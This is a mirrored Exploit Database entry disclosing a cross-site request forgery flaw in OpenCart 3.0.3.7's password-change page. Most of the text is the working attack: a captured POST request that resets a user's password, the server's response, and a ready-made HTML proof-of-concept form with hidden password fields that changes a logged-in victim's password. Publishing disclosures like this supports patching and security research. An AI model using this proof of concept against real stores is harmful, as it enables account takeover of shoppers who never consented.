OpenCart 3.0.3.7 – ‘Change Password’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 17 阅读

• 作者： Mert Daş
  日期： 2021-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49970/

• # Exploit Title		: OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
  # Date			: 2021/08/06
  # Exploit Author	: Mert Daş merterpreter@gmail.com
  # Software Link 	: http://www.opencart.com/index.php?route=download/download
  					: https://github.com/opencart
  # Software web	: www.opencart.com
  # Tested on: Server : Xampp
  
  # Cross-site request forgery
  
  OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
  
  OpenCart is not using any security token to prevent it against CSRF.
  It is vulnerable to all location inside User panel.
  
  Header
  
  ----------------------------------------------------------
  http://localhost/index.php?route=account/password
  
  POST /opencart/index.php?route=account/password HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
  Content-Length: 300
  Origin: http://127.0.0.1
  Connection: close
  Referer: http://127.0.0.1/opencart/index.php?route=account/password
  Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
  Upgrade-Insecure-Requests: 1
  
  -----------------------------3890527419799841332130342675
  Content-Disposition: form-data; name="password"
  
  123asd!
  -----------------------------3890527419799841332130342675
  Content-Disposition: form-data; name="confirm"
  
  123asd!
  -----------------------------3890527419799841332130342675--
  
  
  Response
  
  HTTP/1.1 302 Found
  Date: Tue, 08 Jun 2021 16:52:59 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
  X-Powered-By: PHP/7.4.20
  Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
  Location: http://127.0.0.1/opencart/index.php?route=account/account
  Content-Length: 0
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
  
  ----------------------------------------------------------
  
  Simple Poc to change user Password
  
  <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="password" value="1234asd!" />
  <input type="hidden" name="confirm" value="1234asd!" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>